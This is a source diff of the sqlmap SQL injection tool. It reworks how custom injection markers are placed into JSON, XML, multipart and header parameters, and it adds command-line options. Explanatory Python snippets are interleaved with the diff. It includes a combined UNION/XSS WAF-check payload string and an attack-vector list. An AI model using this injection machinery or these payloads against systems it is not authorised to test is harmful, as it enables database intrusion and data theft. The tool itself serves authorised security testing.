"xm", "xpi", "xpm", "xwd", "xz", "z", "zip", "zipx")

# Patterns often seen in HTTP headers containing custom injection marking character
# Patterns often seen in HTTP headers containing custom injection marking character '*'
PROBLEMATIC_CUSTOM_INJECTION_PATTERNS = r"(;q=[^;']+)|(\*/\*)"

# Template used for common table existence check
@@ -490,6 +497,12 @@ IDS_WAF_CHECK_PAYLOAD = "AND 1=1 UNION ALL SELECT 1,NULL,'<script>alert(\"XSS\")
# Data inside shellcodeexec to be filled with random string
SHELLCODEEXEC_RANDOM_STRING_MARKER = "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"

# Generic address for checking the Internet connection while using switch --check-internet
CHECK_INTERNET_ADDRESS = "http://ipinfo.io/"

# Value to look for in response to CHECK_INTERNET_ADDRESS
CHECK_INTERNET_VALUE = "IP Address Details"

# Vectors used for provoking specific WAF/IPS/IDS behavior(s)
WAF_ATTACK_VECTORS = (
"", # NIL
@@ -624,7 +637,7 @@ VALID_TIME_CHARS_RUN_THRESHOLD = 100
CHECK_ZERO_COLUMNS_THRESHOLD = 10

# Boldify all logger messages containing these "patterns"
BOLD_PATTERNS = ("' injectable", "provided empty", "leftover chars", "might be injectable", "' is vulnerable", "is not injectable", "does not seem to be", "test failed", "test passed", "live test final result", "test shows that", "the back-end DBMS is", "created Github", "blocked by the target server", "protection is involved", "CAPTCHA")
BOLD_PATTERNS = ("' injectable", "provided empty", "leftover chars", "might be injectable", "' is vulnerable", "is not injectable", "does not seem to be", "test failed", "test passed", "live test final result", "test shows that", "the back-end DBMS is", "created Github", "blocked by the target server", "protection is involved", "CAPTCHA", "specific response")

# Generic www root directory names
GENERIC_DOC_ROOT_DIRECTORY_NAMES = ("htdocs", "httpdocs", "public", "wwwroot", "www")
@@ -663,7 +676,7 @@ INVALID_UNICODE_CHAR_FORMAT = r"\x%02x"
XML_RECOGNITION_REGEX = r"(?s)\A\s*<[^>]+>(.+>)?\s*\Z"

# Regular expression used for detecting JSON POST data
JSON_RECOGNITION_REGEX = r'(?s)\A(\s*\[)*\s*\{.*"[^"]+"\s*:\s*("[^"]+"|\d+).*\}\s*(\]\s*)*\Z'
JSON_RECOGNITION_REGEX = r'(?s)\A(\s*\[)*\s*\{.*"[^"]+"\s*:\s*("[^"]*"|\d+|true|false|null).*\}\s*(\]\s*)*\Z'

# Regular expression used for detecting JSON-like POST data
JSON_LIKE_RECOGNITION_REGEX = r"(?s)\A(\s*\[)*\s*\{.*'[^']+'\s*:\s*('[^']+'|\d+).*\}\s*(\]\s*)*\Z"

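A minimal sketch (hypothetical POST body, not part of the diff) of what the widened JSON_RECOGNITION_REGEX changes in practice - empty strings and bare true/false/null values are now enough for the body to be recognized as JSON:

```python
import re

OLD = r'(?s)\A(\s*\[)*\s*\{.*"[^"]+"\s*:\s*("[^"]+"|\d+).*\}\s*(\]\s*)*\Z'
NEW = r'(?s)\A(\s*\[)*\s*\{.*"[^"]+"\s*:\s*("[^"]*"|\d+|true|false|null).*\}\s*(\]\s*)*\Z'

data = '{"username": "", "admin": true}'

print(bool(re.search(OLD, data)))  # False - previously not detected as JSON POST data
print(bool(re.search(NEW, data)))  # True  - detected, so the JSON processing prompt is offered
```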
@@ -9,6 +9,8 @@ import codecs
import functools
import os
import re
import subprocess
import sys
import tempfile
import time
import urlparse
@@ -18,6 +20,7 @@ from lib.core.common import getSafeExString
from lib.core.common import getUnicode
from lib.core.common import hashDBRetrieve
from lib.core.common import intersect
from lib.core.common import isNumPosStrValue
from lib.core.common import normalizeUnicode
from lib.core.common import openFile
from lib.core.common import paramToDict
@@ -49,7 +52,6 @@ from lib.core.option import _setKnowledgeBaseAttributes
from lib.core.option import _setAuthCred
from lib.core.settings import ASTERISK_MARKER
from lib.core.settings import CSRF_TOKEN_PARAMETER_INFIXES
from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR
from lib.core.settings import DEFAULT_GET_POST_DELIMITER
from lib.core.settings import HOST_ALIASES
from lib.core.settings import ARRAY_LIKE_RECOGNITION_REGEX
@@ -111,14 +113,14 @@ def _setRequestParams():
retVal = retVal.replace(_.group(0), match.group(int(_.group(1)) if _.group(1).isdigit() else _.group(1)))
else:
break
if CUSTOM_INJECTION_MARK_CHAR in retVal:
hintNames.append((retVal.split(CUSTOM_INJECTION_MARK_CHAR)[0], match.group("name")))
if kb.customInjectionMark in retVal:
hintNames.append((retVal.split(kb.customInjectionMark)[0], match.group("name")))
return retVal

if kb.processUserMarks is None and CUSTOM_INJECTION_MARK_CHAR in conf.data:
message = "custom injection marking character ('%s') found in option " % CUSTOM_INJECTION_MARK_CHAR
if kb.processUserMarks is None and kb.customInjectionMark in conf.data:
message = "custom injection marker ('%s') found in option " % kb.customInjectionMark
message += "'--data'. Do you want to process it? [Y/n/q] "
choice = readInput(message, default='Y')
choice = readInput(message, default='Y').upper()

if choice == 'Q':
raise SqlmapUserQuitException
@@ -128,81 +130,91 @@ def _setRequestParams():
if kb.processUserMarks:
kb.testOnlyCustom = True

if not (kb.processUserMarks and CUSTOM_INJECTION_MARK_CHAR in conf.data):
if re.search(JSON_RECOGNITION_REGEX, conf.data):
message = "JSON data found in %s data. " % conf.method
message += "Do you want to process it? [Y/n/q] "
choice = readInput(message, default='Y')
if re.search(JSON_RECOGNITION_REGEX, conf.data):
message = "JSON data found in %s data. " % conf.method
message += "Do you want to process it? [Y/n/q] "
choice = readInput(message, default='Y').upper()

if choice == 'Q':
raise SqlmapUserQuitException
elif choice == 'N':
if choice == 'Q':
raise SqlmapUserQuitException
elif choice == 'Y':
if not (kb.processUserMarks and kb.customInjectionMark in conf.data):
conf.data = getattr(conf.data, UNENCODED_ORIGINAL_VALUE, conf.data)
conf.data = conf.data.replace(CUSTOM_INJECTION_MARK_CHAR, ASTERISK_MARKER)
conf.data = re.sub(r'("(?P<name>[^"]+)"\s*:\s*"[^"]+)"', functools.partial(process, repl=r'\g<1>%s"' % CUSTOM_INJECTION_MARK_CHAR), conf.data)
conf.data = re.sub(r'("(?P<name>[^"]+)"\s*:\s*)(-?\d[\d\.]*\b)', functools.partial(process, repl=r'\g<0>%s' % CUSTOM_INJECTION_MARK_CHAR), conf.data)
conf.data = conf.data.replace(kb.customInjectionMark, ASTERISK_MARKER)
conf.data = re.sub(r'("(?P<name>[^"]+)"\s*:\s*"[^"]*)"', functools.partial(process, repl=r'\g<1>%s"' % kb.customInjectionMark), conf.data)
conf.data = re.sub(r'("(?P<name>[^"]+)"\s*:\s*)(-?\d[\d\.]*)\b', functools.partial(process, repl=r'\g<1>\g<3>%s' % kb.customInjectionMark), conf.data)
conf.data = re.sub(r'("(?P<name>[^"]+)"\s*:\s*)((true|false|null))\b', functools.partial(process, repl=r'\g<1>\g<3>%s' % kb.customInjectionMark), conf.data)
match = re.search(r'(?P<name>[^"]+)"\s*:\s*\[([^\]]+)\]', conf.data)
if match and not (conf.testParameter and match.group("name") not in conf.testParameter):
_ = match.group(2)
_ = re.sub(r'("[^"]+)"', '\g<1>%s"' % CUSTOM_INJECTION_MARK_CHAR, _)
_ = re.sub(r'(\A|,|\s+)(-?\d[\d\.]*\b)', '\g<0>%s' % CUSTOM_INJECTION_MARK_CHAR, _)
_ = re.sub(r'("[^"]+)"', '\g<1>%s"' % kb.customInjectionMark, _)
_ = re.sub(r'(\A|,|\s+)(-?\d[\d\.]*\b)', '\g<0>%s' % kb.customInjectionMark, _)
conf.data = conf.data.replace(match.group(0), match.group(0).replace(match.group(2), _))
kb.postHint = POST_HINT.JSON

elif re.search(JSON_LIKE_RECOGNITION_REGEX, conf.data):
message = "JSON-like data found in %s data. " % conf.method
message += "Do you want to process it? [Y/n/q] "
choice = readInput(message, default='Y').upper()
kb.postHint = POST_HINT.JSON

if choice == 'Q':
raise SqlmapUserQuitException
elif choice == 'N':
elif re.search(JSON_LIKE_RECOGNITION_REGEX, conf.data):
message = "JSON-like data found in %s data. " % conf.method
message += "Do you want to process it? [Y/n/q] "
choice = readInput(message, default='Y').upper()

if choice == 'Q':
raise SqlmapUserQuitException
elif choice == 'Y':
if not (kb.processUserMarks and kb.customInjectionMark in conf.data):
conf.data = getattr(conf.data, UNENCODED_ORIGINAL_VALUE, conf.data)
conf.data = conf.data.replace(CUSTOM_INJECTION_MARK_CHAR, ASTERISK_MARKER)
conf.data = re.sub(r"('(?P<name>[^']+)'\s*:\s*'[^']+)'", functools.partial(process, repl=r"\g<1>%s'" % CUSTOM_INJECTION_MARK_CHAR), conf.data)
conf.data = re.sub(r"('(?P<name>[^']+)'\s*:\s*)(-?\d[\d\.]*\b)", functools.partial(process, repl=r"\g<0>%s" % CUSTOM_INJECTION_MARK_CHAR), conf.data)
kb.postHint = POST_HINT.JSON_LIKE
conf.data = conf.data.replace(kb.customInjectionMark, ASTERISK_MARKER)
conf.data = re.sub(r"('(?P<name>[^']+)'\s*:\s*'[^']+)'", functools.partial(process, repl=r"\g<1>%s'" % kb.customInjectionMark), conf.data)
conf.data = re.sub(r"('(?P<name>[^']+)'\s*:\s*)(-?\d[\d\.]*\b)", functools.partial(process, repl=r"\g<0>%s" % kb.customInjectionMark), conf.data)

elif re.search(ARRAY_LIKE_RECOGNITION_REGEX, conf.data):
message = "Array-like data found in %s data. " % conf.method
message += "Do you want to process it? [Y/n/q] "
choice = readInput(message, default='Y').upper()
kb.postHint = POST_HINT.JSON_LIKE

if choice == 'Q':
raise SqlmapUserQuitException
elif choice == 'N':
conf.data = conf.data.replace(CUSTOM_INJECTION_MARK_CHAR, ASTERISK_MARKER)
conf.data = re.sub(r"(=[^%s]+)" % DEFAULT_GET_POST_DELIMITER, r"\g<1>%s" % CUSTOM_INJECTION_MARK_CHAR, conf.data)
kb.postHint = POST_HINT.ARRAY_LIKE
elif re.search(ARRAY_LIKE_RECOGNITION_REGEX, conf.data):
message = "Array-like data found in %s data. " % conf.method
message += "Do you want to process it? [Y/n/q] "
choice = readInput(message, default='Y').upper()

elif re.search(XML_RECOGNITION_REGEX, conf.data):
message = "SOAP/XML data found in %s data. " % conf.method
message += "Do you want to process it? [Y/n/q] "
choice = readInput(message, default='Y').upper()
if choice == 'Q':
raise SqlmapUserQuitException
elif choice == 'Y':
if not (kb.processUserMarks and kb.customInjectionMark in conf.data):
conf.data = conf.data.replace(kb.customInjectionMark, ASTERISK_MARKER)
conf.data = re.sub(r"(=[^%s]+)" % DEFAULT_GET_POST_DELIMITER, r"\g<1>%s" % kb.customInjectionMark, conf.data)

if choice == 'Q':
raise SqlmapUserQuitException
elif choice == 'N':
kb.postHint = POST_HINT.ARRAY_LIKE

elif re.search(XML_RECOGNITION_REGEX, conf.data):
message = "SOAP/XML data found in %s data. " % conf.method
message += "Do you want to process it? [Y/n/q] "
choice = readInput(message, default='Y').upper()

if choice == 'Q':
raise SqlmapUserQuitException
elif choice == 'Y':
if not (kb.processUserMarks and kb.customInjectionMark in conf.data):
conf.data = getattr(conf.data, UNENCODED_ORIGINAL_VALUE, conf.data)
conf.data = conf.data.replace(CUSTOM_INJECTION_MARK_CHAR, ASTERISK_MARKER)
conf.data = re.sub(r"(<(?P<name>[^>]+)( [^<]*)?>)([^<]+)(</\2)", functools.partial(process, repl=r"\g<1>\g<4>%s\g<5>" % CUSTOM_INJECTION_MARK_CHAR), conf.data)
kb.postHint = POST_HINT.SOAP if "soap" in conf.data.lower() else POST_HINT.XML
conf.data = conf.data.replace(kb.customInjectionMark, ASTERISK_MARKER)
conf.data = re.sub(r"(<(?P<name>[^>]+)( [^<]*)?>)([^<]+)(</\2)", functools.partial(process, repl=r"\g<1>\g<4>%s\g<5>" % kb.customInjectionMark), conf.data)

elif re.search(MULTIPART_RECOGNITION_REGEX, conf.data):
message = "Multipart-like data found in %s data. " % conf.method
message += "Do you want to process it? [Y/n/q] "
choice = readInput(message, default='Y').upper()
kb.postHint = POST_HINT.SOAP if "soap" in conf.data.lower() else POST_HINT.XML

if choice == 'Q':
raise SqlmapUserQuitException
elif choice == 'N':
elif re.search(MULTIPART_RECOGNITION_REGEX, conf.data):
message = "Multipart-like data found in %s data. " % conf.method
message += "Do you want to process it? [Y/n/q] "
choice = readInput(message, default='Y').upper()

if choice == 'Q':
raise SqlmapUserQuitException
elif choice == 'Y':
if not (kb.processUserMarks and kb.customInjectionMark in conf.data):
conf.data = getattr(conf.data, UNENCODED_ORIGINAL_VALUE, conf.data)
conf.data = conf.data.replace(CUSTOM_INJECTION_MARK_CHAR, ASTERISK_MARKER)
conf.data = re.sub(r"(?si)((Content-Disposition[^\n]+?name\s*=\s*[\"'](?P<name>[^\n]+?)[\"']).+?)(((\r)?\n)+--)", functools.partial(process, repl=r"\g<1>%s\g<4>" % CUSTOM_INJECTION_MARK_CHAR), conf.data)
kb.postHint = POST_HINT.MULTIPART
conf.data = conf.data.replace(kb.customInjectionMark, ASTERISK_MARKER)
conf.data = re.sub(r"(?si)((Content-Disposition[^\n]+?name\s*=\s*[\"']?(?P<name>[^\"'\r\n]+)[\"']?).+?)(((\r)?\n)+--)", functools.partial(process, repl=r"\g<1>%s\g<4>" % kb.customInjectionMark), conf.data)

kb.postHint = POST_HINT.MULTIPART

if not kb.postHint:
if CUSTOM_INJECTION_MARK_CHAR in conf.data: # later processed
if kb.customInjectionMark in conf.data: # later processed
pass
else:
place = PLACE.POST
@@ -214,12 +226,12 @@ def _setRequestParams():
conf.paramDict[place] = paramDict
testableParameters = True
else:
if CUSTOM_INJECTION_MARK_CHAR not in conf.data: # in case that no usable parameter values has been found
if kb.customInjectionMark not in conf.data: # in case that no usable parameter values has been found
conf.parameters[PLACE.POST] = conf.data

kb.processUserMarks = True if (kb.postHint and CUSTOM_INJECTION_MARK_CHAR in conf.data) else kb.processUserMarks
kb.processUserMarks = True if (kb.postHint and kb.customInjectionMark in conf.data) else kb.processUserMarks

if re.search(URI_INJECTABLE_REGEX, conf.url, re.I) and not any(place in conf.parameters for place in (PLACE.GET, PLACE.POST)) and not kb.postHint and not CUSTOM_INJECTION_MARK_CHAR in (conf.data or "") and conf.url.startswith("http"):
if re.search(URI_INJECTABLE_REGEX, conf.url, re.I) and not any(place in conf.parameters for place in (PLACE.GET, PLACE.POST)) and not kb.postHint and not kb.customInjectionMark in (conf.data or "") and conf.url.startswith("http"):
warnMsg = "you've provided target URL without any GET "
warnMsg += "parameters (e.g. 'http://www.site.com/article.php?id=1') "
warnMsg += "and without providing any POST parameters "
@@ -233,15 +245,15 @@ def _setRequestParams():
if choice == 'Q':
raise SqlmapUserQuitException
elif choice == 'Y':
conf.url = "%s%s" % (conf.url, CUSTOM_INJECTION_MARK_CHAR)
conf.url = "%s%s" % (conf.url, kb.customInjectionMark)
kb.processUserMarks = True

for place, value in ((PLACE.URI, conf.url), (PLACE.CUSTOM_POST, conf.data), (PLACE.CUSTOM_HEADER, str(conf.httpHeaders))):
_ = re.sub(PROBLEMATIC_CUSTOM_INJECTION_PATTERNS, "", value or "") if place == PLACE.CUSTOM_HEADER else value or ""
if CUSTOM_INJECTION_MARK_CHAR in _:
if kb.customInjectionMark in _:
if kb.processUserMarks is None:
lut = {PLACE.URI: '-u', PLACE.CUSTOM_POST: '--data', PLACE.CUSTOM_HEADER: '--headers/--user-agent/--referer/--cookie'}
message = "custom injection marking character ('%s') found in option " % CUSTOM_INJECTION_MARK_CHAR
message = "custom injection marker ('%s') found in option " % kb.customInjectionMark
message += "'%s'. Do you want to process it? [Y/n/q] " % lut[place]
choice = readInput(message, default='Y').upper()

@@ -253,7 +265,7 @@ def _setRequestParams():
if kb.processUserMarks:
kb.testOnlyCustom = True

if "=%s" % CUSTOM_INJECTION_MARK_CHAR in _:
if "=%s" % kb.customInjectionMark in _:
warnMsg = "it seems that you've provided empty parameter value(s) "
warnMsg += "for testing. Please, always use only valid parameter values "
warnMsg += "so sqlmap could be able to run properly"
@@ -285,13 +297,13 @@ def _setRequestParams():
if place == PLACE.CUSTOM_HEADER:
for index in xrange(len(conf.httpHeaders)):
header, value = conf.httpHeaders[index]
if CUSTOM_INJECTION_MARK_CHAR in re.sub(PROBLEMATIC_CUSTOM_INJECTION_PATTERNS, "", value):
parts = value.split(CUSTOM_INJECTION_MARK_CHAR)
if kb.customInjectionMark in re.sub(PROBLEMATIC_CUSTOM_INJECTION_PATTERNS, "", value):
parts = value.split(kb.customInjectionMark)
for i in xrange(len(parts) - 1):
conf.paramDict[place]["%s #%d%s" % (header, i + 1, CUSTOM_INJECTION_MARK_CHAR)] = "%s,%s" % (header, "".join("%s%s" % (parts[j], CUSTOM_INJECTION_MARK_CHAR if i == j else "") for j in xrange(len(parts))))
conf.httpHeaders[index] = (header, value.replace(CUSTOM_INJECTION_MARK_CHAR, ""))
conf.paramDict[place]["%s #%d%s" % (header, i + 1, kb.customInjectionMark)] = "%s,%s" % (header, "".join("%s%s" % (parts[j], kb.customInjectionMark if i == j else "") for j in xrange(len(parts))))
conf.httpHeaders[index] = (header, value.replace(kb.customInjectionMark, ""))
else:
parts = value.split(CUSTOM_INJECTION_MARK_CHAR)
parts = value.split(kb.customInjectionMark)

for i in xrange(len(parts) - 1):
name = None
@@ -301,8 +313,8 @@ def _setRequestParams():
name = "%s %s" % (kb.postHint, _)
break
if name is None:
name = "%s#%s%s" % (("%s " % kb.postHint) if kb.postHint else "", i + 1, CUSTOM_INJECTION_MARK_CHAR)
conf.paramDict[place][name] = "".join("%s%s" % (parts[j], CUSTOM_INJECTION_MARK_CHAR if i == j else "") for j in xrange(len(parts)))
name = "%s#%s%s" % (("%s " % kb.postHint) if kb.postHint else "", i + 1, kb.customInjectionMark)
conf.paramDict[place][name] = "".join("%s%s" % (parts[j], kb.customInjectionMark if i == j else "") for j in xrange(len(parts)))

if place == PLACE.URI and PLACE.GET in conf.paramDict:
del conf.paramDict[PLACE.GET]
@@ -314,7 +326,7 @@ def _setRequestParams():
if kb.processUserMarks:
for item in ("url", "data", "agent", "referer", "cookie"):
if conf.get(item):
conf[item] = conf[item].replace(CUSTOM_INJECTION_MARK_CHAR, "")
conf[item] = conf[item].replace(kb.customInjectionMark, "")

# Perform checks on Cookie parameters
if conf.cookie:
@@ -363,8 +375,8 @@ def _setRequestParams():

if condition:
conf.parameters[PLACE.CUSTOM_HEADER] = str(conf.httpHeaders)
conf.paramDict[PLACE.CUSTOM_HEADER] = {httpHeader: "%s,%s%s" % (httpHeader, headerValue, CUSTOM_INJECTION_MARK_CHAR)}
conf.httpHeaders = [(header, value.replace(CUSTOM_INJECTION_MARK_CHAR, "")) for header, value in conf.httpHeaders]
conf.paramDict[PLACE.CUSTOM_HEADER] = {httpHeader: "%s,%s%s" % (httpHeader, headerValue, kb.customInjectionMark)}
conf.httpHeaders = [(header, value.replace(kb.customInjectionMark, "")) for header, value in conf.httpHeaders]
testableParameters = True

if not conf.parameters:
@@ -390,7 +402,7 @@ def _setRequestParams():
message += "Do you want sqlmap to automatically update it in further requests? [y/N] "

if readInput(message, default='N', boolean=True):
conf.csrfToken = parameter
conf.csrfToken = getUnicode(parameter)
break

def _setHashDB():
@@ -425,7 +437,7 @@ def _resumeHashDBValues():
kb.xpCmdshellAvailable = hashDBRetrieve(HASHDB_KEYS.KB_XP_CMDSHELL_AVAILABLE) or kb.xpCmdshellAvailable

kb.errorChunkLength = hashDBRetrieve(HASHDB_KEYS.KB_ERROR_CHUNK_LENGTH)
if kb.errorChunkLength and kb.errorChunkLength.isdigit():
if isNumPosStrValue(kb.errorChunkLength):
kb.errorChunkLength = int(kb.errorChunkLength)
else:
kb.errorChunkLength = None
@@ -636,30 +648,31 @@ def _createTargetDirs():

conf.outputPath = os.path.join(getUnicode(paths.SQLMAP_OUTPUT_PATH), normalizeUnicode(getUnicode(conf.hostname)))

if not os.path.isdir(conf.outputPath):
try:
try:
if not os.path.isdir(conf.outputPath):
os.makedirs(conf.outputPath, 0755)
except (OSError, IOError), ex:
try:
tempDir = tempfile.mkdtemp(prefix="sqlmapoutput")
except Exception, _:
errMsg = "unable to write to the temporary directory ('%s'). " % _
errMsg += "Please make sure that your disk is not full and "
errMsg += "that you have sufficient write permissions to "
errMsg += "create temporary files and/or directories"
raise SqlmapSystemException(errMsg)
except (OSError, IOError, TypeError), ex:
try:
tempDir = tempfile.mkdtemp(prefix="sqlmapoutput")
except Exception, _:
errMsg = "unable to write to the temporary directory ('%s'). " % _
errMsg += "Please make sure that your disk is not full and "
errMsg += "that you have sufficient write permissions to "
errMsg += "create temporary files and/or directories"
raise SqlmapSystemException(errMsg)

warnMsg = "unable to create output directory "
warnMsg += "'%s' (%s). " % (conf.outputPath, getUnicode(ex))
warnMsg += "Using temporary directory '%s' instead" % getUnicode(tempDir)
logger.warn(warnMsg)
warnMsg = "unable to create output directory "
warnMsg += "'%s' (%s). " % (conf.outputPath, getUnicode(ex))
warnMsg += "Using temporary directory '%s' instead" % getUnicode(tempDir)
logger.warn(warnMsg)

conf.outputPath = tempDir
conf.outputPath = tempDir

try:
with codecs.open(os.path.join(conf.outputPath, "target.txt"), "w+", UNICODE_ENCODING) as f:
f.write(kb.originalUrls.get(conf.url) or conf.url or conf.hostname)
f.write(" (%s)" % (HTTPMETHOD.POST if conf.data else HTTPMETHOD.GET))
f.write(" # %s" % getUnicode(subprocess.list2cmdline(sys.argv), encoding=sys.stdin.encoding))
if conf.data:
f.write("\n\n%s" % getUnicode(conf.data))
except IOError, ex:

@@ -31,7 +31,6 @@ from lib.core.settings import BASIC_HELP_ITEMS
from lib.core.settings import DUMMY_URL
from lib.core.settings import IS_WIN
from lib.core.settings import MAX_HELP_OPTION_LENGTH
from lib.core.settings import UNICODE_ENCODING
from lib.core.settings import VERSION_STRING
from lib.core.shell import autoCompletion
from lib.core.shell import clearHistory
@@ -48,7 +47,8 @@ def cmdLineParser(argv=None):

checkSystemEncoding()

_ = getUnicode(os.path.basename(argv[0]), encoding=sys.getfilesystemencoding() or UNICODE_ENCODING)
# Reference: https://stackoverflow.com/a/4012683 (Note: previously used "...sys.getfilesystemencoding() or UNICODE_ENCODING")
_ = getUnicode(os.path.basename(argv[0]), encoding=sys.stdin.encoding)

usage = "%s%s [options]" % ("python " if not IS_WIN else "", \
"\"%s\"" % _ if " " in _ else _)
@@ -149,8 +149,8 @@ def cmdLineParser(argv=None):
request.add_option("--auth-file", dest="authFile",
help="HTTP authentication PEM cert/private key file")

request.add_option("--ignore-401", dest="ignore401", action="store_true",
help="Ignore HTTP Error 401 (Unauthorized)")
request.add_option("--ignore-code", dest="ignoreCode", type="int",
help="Ignore HTTP error code (e.g. 401)")

request.add_option("--ignore-proxy", dest="ignoreProxy", action="store_true",
help="Ignore system default proxy settings")
@@ -321,7 +321,7 @@ def cmdLineParser(argv=None):

detection.add_option("--risk", dest="risk", type="int",
help="Risk of tests to perform (1-3, "
"default %d)" % defaults.level)
"default %d)" % defaults.risk)

detection.add_option("--string", dest="string",
help="String to match when "
@@ -617,9 +617,6 @@ def cmdLineParser(argv=None):
general = OptionGroup(parser, "General", "These options can be used "
"to set some general working parameters")

#general.add_option("-x", dest="xmlFile",
# help="Dump the data into an XML file")

general.add_option("-s", dest="sessionFile",
help="Load session from a stored (.sqlite) file")

@@ -634,8 +631,9 @@ def cmdLineParser(argv=None):
general.add_option("--binary-fields", dest="binaryFields",
help="Result fields having binary values (e.g. \"digest\")")

general.add_option("--charset", dest="charset",
help="Force character encoding used for data retrieval")
general.add_option("--check-internet", dest="checkInternet",
action="store_true",
help="Check Internet connection before assessing the target")

general.add_option("--crawl", dest="crawlDepth", type="int",
help="Crawl the website starting from the target URL")
@@ -647,13 +645,18 @@ def cmdLineParser(argv=None):
help="Delimiting character used in CSV output "
"(default \"%s\")" % defaults.csvDel)

general.add_option("--charset", dest="charset",
help="Blind SQL injection charset (e.g. \"0123456789abcdef\")")

general.add_option("--dump-format", dest="dumpFormat",
help="Format of dumped data (CSV (default), HTML or SQLITE)")

general.add_option("--encoding", dest="encoding",
help="Character encoding used for data retrieval (e.g. GBK)")

general.add_option("--eta", dest="eta",
action="store_true",
help="Display for each output the "
"estimated time of arrival")
help="Display for each output the estimated time of arrival")

general.add_option("--flush-session", dest="flushSession",
action="store_true",
@@ -667,6 +670,9 @@ def cmdLineParser(argv=None):
action="store_true",
help="Ignore query results stored in session file")

general.add_option("--har", dest="harFile",
help="Log all HTTP traffic into a HAR file")

general.add_option("--hex", dest="hexConvert",
action="store_true",
help="Use DBMS hex function(s) for data retrieval")
@@ -779,6 +785,9 @@ def cmdLineParser(argv=None):
parser.add_option("--profile", dest="profile", action="store_true",
help=SUPPRESS_HELP)

parser.add_option("--force-dbms", dest="forceDbms",
help=SUPPRESS_HELP)

parser.add_option("--force-dns", dest="forceDns", action="store_true",
help=SUPPRESS_HELP)

@@ -844,8 +853,9 @@ def cmdLineParser(argv=None):
advancedHelp = True
extraHeaders = []

# Reference: https://stackoverflow.com/a/4012683 (Note: previously used "...sys.getfilesystemencoding() or UNICODE_ENCODING")
for arg in argv:
_.append(getUnicode(arg, encoding=sys.getfilesystemencoding() or UNICODE_ENCODING))
_.append(getUnicode(arg, encoding=sys.stdin.encoding))

argv = _
checkDeprecatedOptions(argv)

@@ -23,11 +23,10 @@ def headersParser(headers):

if not kb.headerPaths:
kb.headerPaths = {
"cookie": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "cookie.xml"),
"microsoftsharepointteamservices": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "sharepoint.xml"),
"server": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "server.xml"),
"servlet-engine": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "servlet.xml"),
"set-cookie": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "cookie.xml"),
"servlet-engine": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "servlet-engine.xml"),
"set-cookie": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "set-cookie.xml"),
"x-aspnet-version": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "x-aspnet-version.xml"),
"x-powered-by": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "x-powered-by.xml"),
}

@@ -46,7 +46,7 @@ from lib.utils.htmlentities import htmlEntities
from thirdparty.chardet import detect
from thirdparty.odict.odict import OrderedDict

def forgeHeaders(items=None):
def forgeHeaders(items=None, base=None):
"""
Prepare HTTP Cookie, HTTP User-Agent and HTTP Referer headers to use when performing
the HTTP requests
@@ -58,7 +58,7 @@ def forgeHeaders(items=None):
if items[_] is None:
del items[_]

headers = OrderedDict(conf.httpHeaders)
headers = OrderedDict(base or conf.httpHeaders)
headers.update(items.items())

class _str(str):
@@ -95,7 +95,7 @@ def forgeHeaders(items=None):
if cookie.domain_specified and not conf.hostname.endswith(cookie.domain):
continue

if ("%s=" % getUnicode(cookie.name)) in headers[HTTP_HEADER.COOKIE]:
if ("%s=" % getUnicode(cookie.name)) in getUnicode(headers[HTTP_HEADER.COOKIE]):
if conf.loadCookies:
conf.httpHeaders = filter(None, ((item if item[0] != HTTP_HEADER.COOKIE else None) for item in conf.httpHeaders))
elif kb.mergeCookies is None:
@@ -123,7 +123,7 @@ def forgeHeaders(items=None):

return headers

def parseResponse(page, headers):
def parseResponse(page, headers, status=None):
"""
@param page: the page to parse to feed the knowledge base htmlFp
(back-end DBMS fingerprint based upon DBMS error messages return
@@ -135,7 +135,7 @@ def parseResponse(page, headers):
headersParser(headers)

if page:
htmlParser(page)
htmlParser(page if not status else "%s\n\n%s" % (status, page))

@cachedmethod
def checkCharEncoding(encoding, warn=True):
@@ -155,7 +155,7 @@ def checkCharEncoding(encoding, warn=True):
return encoding

# Reference: http://www.destructor.de/charsets/index.htm
translate = {"windows-874": "iso-8859-11", "utf-8859-1": "utf8", "en_us": "utf8", "macintosh": "iso-8859-1", "euc_tw": "big5_tw", "th": "tis-620", "unicode": "utf8", "utc8": "utf8", "ebcdic": "ebcdic-cp-be", "iso-8859": "iso8859-1", "ansi": "ascii", "gbk2312": "gbk", "windows-31j": "cp932", "en": "us"}
translate = {"windows-874": "iso-8859-11", "utf-8859-1": "utf8", "en_us": "utf8", "macintosh": "iso-8859-1", "euc_tw": "big5_tw", "th": "tis-620", "unicode": "utf8", "utc8": "utf8", "ebcdic": "ebcdic-cp-be", "iso-8859": "iso8859-1", "iso-8859-0": "iso8859-1", "ansi": "ascii", "gbk2312": "gbk", "windows-31j": "cp932", "en": "us"}

for delimiter in (';', ',', '('):
if delimiter in encoding:
@@ -204,7 +204,7 @@ def checkCharEncoding(encoding, warn=True):
# Reference: http://philip.html5.org/data/charsets-2.html
if encoding in translate:
encoding = translate[encoding]
elif encoding in ("null", "{charset}", "*") or not re.search(r"\w", encoding):
elif encoding in ("null", "{charset}", "charset", "*") or not re.search(r"\w", encoding):
return None

# Reference: http://www.iana.org/assignments/character-sets
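A minimal sketch (simplified stand-in, not sqlmap code) of what the translate table in checkCharEncoding() is for: mapping server-reported charset aliases onto names that Python's codecs module actually recognizes, with "iso-8859-0" being the alias newly handled in this changeset:

```python
# Simplified alias normalization, mirroring the intent of the translate dict above
translate = {"windows-31j": "cp932", "iso-8859-0": "iso8859-1", "utc8": "utf8"}

def normalize(encoding):
    encoding = encoding.strip().lower()
    return translate.get(encoding, encoding)

print(normalize("Windows-31J"))  # cp932
print(normalize("ISO-8859-0"))   # iso8859-1 (newly handled alias)
print(normalize("utf-8"))        # utf-8 (already a valid codec name)
```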
@@ -279,7 +279,7 @@ def decodePage(page, contentEncoding, contentType):
kb.pageCompress = False
raise SqlmapCompressionException

if not conf.charset:
if not conf.encoding:
httpCharset, metaCharset = None, None

# Reference: http://stackoverflow.com/questions/1020892/python-urllib2-read-to-unicode
@@ -296,7 +296,7 @@ def decodePage(page, contentEncoding, contentType):
else:
kb.pageEncoding = None
else:
